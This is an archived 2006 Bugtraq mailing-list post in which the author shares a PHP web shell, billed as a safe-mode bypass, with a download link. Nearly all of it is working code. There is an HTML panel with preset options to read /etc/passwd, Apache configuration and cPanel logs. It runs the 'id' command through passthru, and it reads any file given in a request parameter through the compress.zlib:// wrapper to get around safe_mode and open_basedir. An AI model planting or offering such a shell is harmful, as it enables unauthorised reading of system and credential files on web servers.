lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 18 Jul 2006 13:32:29 -0000
From: d3nger@...mail.com
To: bugtraq@...urityfocus.com
Subject: new shell bypass safe mode

i programing scripit for passing the safe mode
the code
<head>
  <meta http-equiv="Content-Language" content="en-us">
  <title></title>
<body bgcolor="#000000" text="#00FF00">
<b>
<font size=-2 face=verdana color=white>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
	<font size=-2 face=verdana color=white>
	<TABLE style="BORDER-COLLAPSE: collapse" height=18 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
		<td width="990" height="18" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
		<p align="center">
		<font face="Arial">&nbsp; </font><font face="Arial" color="#1FE51A">
		Design And Programing by D3nGeR [at] HotMail [dot] CoM</font></p></td></tr></table></font></a></font></b>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Tahoma" size="4" color="#FFFFFF">DaNgEr
SaFe M0dE ShEll v1.0</font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
        <form method="POST">
            <p align="center">Extra:
			<select size="1" name="file" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
            <option value="/var/cpanel/accounting.log" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">View cpanel logs</option>
            <option value="/etc/httpd/conf/httpd.conf" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Apache config</option>
            <option value="/etc/passwd" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Get /etc/passwd</option>
            <option value="/etc/hosts" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">Hosts</option>
            </select>
			<input type="submit" value="Go" name="B1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000"></p>
        </form>
<table border=1 width=100% style="border-style:solid; border-width:1px; color: #00FF00; background-color: #000000" bordercolorlight="#000000" bordercolordark="#000000"><tr>
<font size="4px">
<b>
	<font size=-2 face=verdana color=white>
	<td>
<font size=-2 face=verdana>
<font size="4px">
	<font face="Arial">
	<b><font size="1"><span lang="ar-sa">uname -a</span>:&nbsp;<?php echo php_uname(); ?></font></b></font><font size="1"><b><font face="Arial">&nbsp;</font></b></font></font><b> </b>

<br>
<b><span lang="ar-sa">ID:</span>:</b> <? passthru("id");?></div></td>
	</font></b>
</font>
	</tr></table>

</head>


<?php
/*
by D3nGeR
D3nger [at] Hotmail [dot] CoM
*/
$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "<font color=\"red\">ON (secure)</font>";
    }
    else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
    echo("Safe-mode: $hsafemode");
    $v = @ini_get("open_basedir");
    if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
    else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
    echo("<br>");
    echo("Open base dir: $hopenbasedir");
    echo("<br>");
    $version=("Safe Mode Shell 1.5(beta)");
    echo "Disable functions : <b>";
    if(''==($df=@..._get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
    $free = @diskfreespace($dir);
    if (!$free) {$free = 0;}
    $all = @disk_total_space($dir);
    if (!$all) {$all = 0;}
    $used = $all-$free;
    $used_percent = @round(100/($all/$free),2);
      error_reporting(E_WARNING);
      ini_set("display_errors", 1);



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">MaDe By D3nGeR
</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. D3nGeR
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}

the file in zip file
http://anti-security.net/downloads/safe-acces.zip
see u bye

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ